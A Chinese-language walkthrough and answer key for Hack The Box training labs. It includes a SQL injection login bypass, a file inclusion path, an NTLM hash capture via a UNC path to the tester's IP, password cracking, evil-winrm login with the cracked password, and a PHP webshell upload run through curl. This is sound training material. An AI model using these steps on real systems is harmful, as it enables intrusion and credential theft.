Apointment
答案:Structured Query Language(结构化查询语言)
答案:sql injection(sql注入)
答案:A03:2021-Injection
答案:Apache httpd 2.4.38 ((Debian)) 使用-sV
答案:443
答案:directory
答案:404
(1xx信息响应表示服务器收到请求,需要请求者继续执行操作)
(2xx成功请求并处理)
(3xx重定向,需要进一步完成重定向后的内容的操作)
(4xx客户端错误请求包含错误语法或攻击参数waf拦截)
(5xx服务器错误,服务器处理用户请求时发生错误)
答案:dir(sudo gobuster dir -u host -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html,txt,js,bak)
答案:#
答案:congratulations
万能密码admin' #进入即可
Sequel
答案:3306
答案:MariaDB
答案:-u
答案:root(mysql -h 10.129.95.232 -P 3306 -u root -p)
答案:*
答案:;
答案:htb
答案:
Crocodile
答案:-sC
答案:vsftpd 3.0.3
答案:230
答案:anonymous
答案:get
答案:admin
答案:apache httpd 2.4.41
答案:-x(sudo gobuster dir -u host -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html,txt,js,bak)
答案:login.php
答案:从ftp中get出来的两个文件登录
Responder
答案:unika.htb
hosts解析
80端口有重定向可以通过修改hosts文件来解析其域名,添加IP地址和重定向跳转的域名,从而可以成功显示网站页面信息
答案:php(抓包,指纹验证,nmap加参数扫描等都可以得到)
答案:page
答案:../../../../../../../../windows/system32/drivers/etc/hosts
答案://10.10.14.6/somefile
答案:New Technology LAN Manager
答案:-I
答案:john the ripper (John介绍及常用命令使用说明_john使用-CSDN博客)
sudo responder -I tun0(使用responder来监听指定网卡,可以看到监听的网卡的信息)
内网渗透-Responder捕获Win哈希_responder 渗透-CSDN博客
通过访问指定的那个网卡IP地址来远程访问文件或者使用浏览器,responder就能抓取hash
进入responder目录下
用sudo ./DumpHash.py来导出抓取到的hash,然后使用john来破解hash得到密码
此时生成两个文件,DumpNTLMv1.txt和DumpNTLMv2.txt
答案:badminton
答案:5985
答案:
由于80端口页面没有flag查看5985端口搜索后发现,为远程管理
evil-winrm -i host -p badminton -u administrator
成功连接
成功拿到flag
Three
答案:2
答案:thetoppers.htb(开80端口直接访问ip得到)
答案:/etc/hosts(responder关用到过)
答案:s3.thetoppers.htb
根据任务2可知域名thetoppers.htb
sudo gobuster vhost -u http://thetoppers.htb -w /usr/share/wordlists/domain_dic.txt
Web 扫描神器:Gobuster 保姆级教程(附链接)_gobuster参数-CSDN博客
答案:amazon S3
爆破出的子域名不可访问修改hosts通过解析
答案:awscli
答案:apt-get install awscli、
aws configure
配置
tldr aws可查看工具用法 使用前更新 tldr --update
答案:AWS S3 LS
答案:php
在中使用终端节点 AWS CLI - AWS Command Line Interface (amazon.com)
答案:
通过工具访问
写个一句话木马上传shell
aws s3 --endpoint=http://s3.thetoppers.htb ls s3://thetoppers.htb 查看是否上传
因为get可以浏览器访问或者curl访问curl -v http://thetoppers.htb/shell.php?cmd=id
存在回显说明成功
一种是用参数直接搜索
一种是反弹shell (HTB_Three之aws s3拿shell_htb three-CSDN博客)